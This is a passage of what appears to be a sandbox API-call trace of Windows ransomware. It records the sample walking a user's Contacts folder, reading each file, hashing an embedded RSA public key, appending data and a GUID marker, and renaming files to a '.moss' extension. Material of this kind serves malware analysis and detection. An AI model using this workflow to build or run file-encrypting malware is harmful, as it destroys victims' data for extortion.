ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0168.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0168.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0168.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0168.938] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0168.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0168.940] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1174) returned 1 [0168.940] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0168.944] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.944] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0168.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.946] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.946] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.946] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x496, lpOverlapped=0x0) returned 1 [0168.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.946] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0168.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.946] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0168.947] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0168.947] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0168.947] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0168.947] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0168.947] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0168.947] GetLastError () returned 0x0 [0168.947] SetLastError (dwErrCode=0x0) [0168.947] GetLastError () returned 0x0 [0168.947] SetLastError (dwErrCode=0x0) [0168.947] GetLastError () returned 0x0 [0168.947] SetLastError (dwErrCode=0x0) [0168.947] GetLastError () returned 0x0 [0168.947] SetLastError (dwErrCode=0x0) [0168.947] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.948] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0168.948] GetLastError () returned 0x0 [0168.948] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.949] SetLastError (dwErrCode=0x0) [0168.949] GetLastError () returned 0x0 [0168.950] SetLastError (dwErrCode=0x0) [0168.950] GetLastError () returned 0x0 [0168.950] SetLastError (dwErrCode=0x0) [0168.950] GetLastError () returned 0x0 [0168.950] SetLastError (dwErrCode=0x0) [0168.950] GetLastError () returned 0x0 [0168.950] SetLastError (dwErrCode=0x0) [0168.950] GetLastError () returned 0x0 [0168.950] SetLastError (dwErrCode=0x0) [0168.950] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.950] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0168.950] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0168.950] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0168.950] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0168.950] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0168.950] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0168.950] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0168.950] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0168.950] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0168.950] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.950] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0168.950] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4a0) returned 0x3b447b0 [0168.950] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0168.950] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0168.950] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44c58 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613670 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44fa8 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbb8 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44ff0 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc18 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc48 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc60 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0168.951] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b48820 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a40 [0168.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc48 | out: hHeap=0xcd0000) returned 1 [0168.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc60 | out: hHeap=0xcd0000) returned 1 [0168.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0168.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0168.951] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a40 | out: hHeap=0xcd0000) returned 1 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc60 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbc48 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0168.951] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc60 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc48 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613670 | out: hHeap=0xcd0000) returned 1 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.952] GetCurrentThreadId () returned 0x324 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd31700 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.952] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.952] GetCurrentThreadId () returned 0x324 [0168.952] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0168.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0168.953] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0168.953] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0168.954] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.954] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0168.954] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0168.954] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0168.954] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0168.954] CloseHandle (hObject=0x664) returned 1 [0168.955] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.moss")) returned 1 [0168.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0168.956] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0168.956] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.958] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0168.958] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0168.958] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0168.958] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0168.959] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1172) returned 1 [0168.959] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0168.963] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.963] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0168.966] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x494, lpOverlapped=0x0) returned 1 [0168.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.967] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0168.967] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.003] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.003] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.003] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.003] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.003] GetLastError () returned 0x0 [0169.003] SetLastError (dwErrCode=0x0) [0169.003] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.004] SetLastError (dwErrCode=0x0) [0169.004] GetLastError () returned 0x0 [0169.005] SetLastError (dwErrCode=0x0) [0169.005] GetLastError () returned 0x0 [0169.005] SetLastError (dwErrCode=0x0) [0169.005] GetLastError () returned 0x0 [0169.005] SetLastError (dwErrCode=0x0) [0169.005] GetLastError () returned 0x0 [0169.005] SetLastError (dwErrCode=0x0) [0169.005] GetLastError () returned 0x0 [0169.005] SetLastError (dwErrCode=0x0) [0169.005] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.005] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.005] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.005] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.005] UuidToStringA (in: 